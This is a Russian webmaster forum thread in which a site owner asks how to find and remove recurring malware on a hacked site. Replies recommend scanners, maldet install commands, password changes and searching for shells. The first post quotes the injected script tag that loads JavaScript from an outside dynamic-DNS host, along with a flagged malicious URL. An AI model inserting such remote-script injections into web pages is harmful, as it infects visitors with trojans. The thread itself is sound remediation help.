|
|
Как найти вредоносный код в сайте??? |
|
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности. |
![]() |
|
Опции темы | Оценить тему | Опции просмотра |
![]() |
#1 |
|
![]() ![]() Здравствуйте ув. форумчане. В 10й раз вынужден просить Вашей помощи. Никак не могу справиться с вирусами у себя на сайте. Сайт www.monti-sib.ru
Начнем по порядку: Около 1,5 месяцев назад была проблема с вредоносным кодом (base64_decode. Разобрался, удалил. Вроде все стало хорошо, даже индексировать вновь яндекс начал. Но, буквально через недели 2 появился новый ко. Сначала не мог понять что за код, потом с помощью тех. поддержки Яндекса все таки выяснил что код вида: </html> } <script src="http://feelthesame.changeip.name/rsize.js"></script> Нашел, удалил. Залил обратно на сервер... первое время все было хорошо, НО теперь Яндекс вообще не пускает на сайт, пишет что сайт вредоносный. Якобы 2 страницы с таким кодом: главная и раздел крио оборудование. Вроде код удалил весь! через Notepad++ проверяю - нет его. Тех поддержка пишет, что есть! Однако, когда захожу на сайт, даже у меня антивирус ругается, пишет следующее: http://fdlfvbh.ddns.name:1964/techno...tend-thats.php JS/Kryptik.AGF троянская программа Забиваю это в Нотпал - нет его! Проверил антивирусом скопированный на лок. диск сайт - нашел только, что файл JQuery.zip поврежден. Что делать? Где искать код вредоносный? Спасибо заранее ![]() |
![]() |
![]() ![]() ![]() |
![]() |
#2 |
|
![]() Мне один сайтег взломали 3 раза за месяц после чего я снял права на запись для всех пользователей. Теперь тишина уже 2 месяца без происшествий.
![]() Знаю много, а толку мало. Я ленивая задница.
![]() |
![]() |
![]() ![]() ![]() |
![]() |
#3 |
|
![]() http://antivirus-alarm.ru/proverka/?...w.monti-sib.ru
ознакомьтесь только три авера пока ругаются и лочат сайт если было все хорошо, то попробуйте из бекапа восстановить или в тп написать чтобы из своих восстановили. ![]() KINGSKIN.ORG рулетка cs go
![]() |
![]() |
![]() ![]() ![]() |
![]() |
#4 |
|
![]() ![]() |
![]() |
![]() ![]() ![]() |
![]() |
#5 |
|
![]() слить себе папочку с сайтом и просканить ее.
хотите я своим авером посмотрю ? ![]() ![]() KINGSKIN.ORG рулетка cs go
![]() |
![]() |
![]() ![]() ![]() |
![]() |
#6 |
|
![]() ![]() |
![]() |
![]() ![]() ![]() |
![]() |
#7 |
|
![]() айболитом посмотри
http://revisium.com/ai/ |
![]() |
![]() ![]() ![]() |
![]() |
#8 |
|
![]() пиши в тех.поддержку хостинга пусть помогают
|
![]() |
![]() ![]() ![]() |
![]() |
#9 |
|
![]() Кстати отличный способ! Я таким образом нашел вирус на сайте. Авирой
![]() Здесь есть что-то прикольное
|
![]() |
![]() ![]() ![]() |
![]() |
#10 |
|
![]() 2ip.ru - принцип работы в этом сервисе обычный: прописываем адрес сайта который нужно проверить на наличие вредоносного кода и нажимаем кнопку «Проверить». После проверки вам выдаётся сообщение, были ли обнаружены на сайте вирусы или подозрительные коды. Этот сервис также проверяет, считают ли поисковики Яндекс и Google этот сайт зараженным. Но не всё так просто.
|
![]() |
![]() ![]() ![]() |
![]() |
#11 |
|
![]() Если немного знакомы с администрированием, то советую использовать maldet, как вариант попросите своего хостера установить и проверить ваши данные.
cd /usr/local/src/ wget rfxn.com/downloads/maldetect-current.tar.gz tar -xzf maldetect-current.tar.gz cd maldetect-* sh ./install.sh maldet --update-ver maldet --update Запустить сканирование, например директории /home, можно так maldet -a /home |
![]() |
![]() ![]() ![]() |
![]() |
#12 |
|
![]() У меня когда вирус был на сайте. Он прописался в каждом, абсолютно в каждом файле внизу.
Все JS коды, все html, php, даже в css. Код еще сложно найти потом что он зашифрован. Просмотрите все файлы. Именно конец этих файлов. Конец, потому что если они поставят его выше, то может сайт сломаться, а им этого не нужно, им нужно что бы все работало хорошо и не вызывало подозрений. ![]() В мире нет Вечных Двигателей, зато полно Вечных Тормозов. . .
Записки профессора ![]() |
![]() |
![]() ![]() ![]() |
![]() |
#13 |
|
![]() Hohol36g, на чем стоит сайт? Самописная цмс?
я бы на вашем месте в первую очередь задумался бы, как туда вирус то попал) Не первый же раз... Может шел залит? а почему в конце страниц сайта стоит }? Это нормально что чпу в виде index.php/page? Оффтоп:
![]() andreisoroka.com
|
![]() |
![]() ![]() ![]() |
![]() |
#14 |
|
![]() какае нафиг антивирусы, люди не смешите, ТС, во первых смени везде пароли, в третих попроси хостера дать лог ошибок чтобы посмотреть через чо ломали твой сайт ,в третих найди шелл среди файлов и почисти файли от бекдоров, иначе будешь всю жизнь с подобной заразой мучаться
|
![]() |
![]() ![]() ![]() |
![]() |
#15 |
|
![]() Два варианта скачать сайт пройтись антивирусом,
Второй вариант установить айболит http://revisium.com/ai/ Третий в вебмастере google посмотреть вкладку вредоносное ПО - они обычно указывают что где. ![]() Мои проекты:
диджитал агентство спортивная одежда магазин туристического снаряжения |
![]() |
![]() ![]() ![]() |
![]() |
Метки |
вредоносные скрипты, вредоносный код |
|
Опции темы | |
Опции просмотра | Оценка этой теме |
|
|
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Вредоносный код на сайте | emlonlife | Яndex | 3 | 12.01.2012 13:30 |
Вредоносный код | tsa | Безопасность | 12 | 20.04.2011 20:41 |
Вредоносный код. | Jaga | Яndex | 3 | 17.02.2011 12:04 |
вредоносный код | Анатолька | Безопасность | 7 | 06.07.2010 20:06 |
Помогите найти ошибки на сайте.... | ogerrr | Раскрутка в общих чертах | 4 | 04.12.2008 18:51 |
|
Текущее время: 20:37. Часовой пояс GMT +3.
|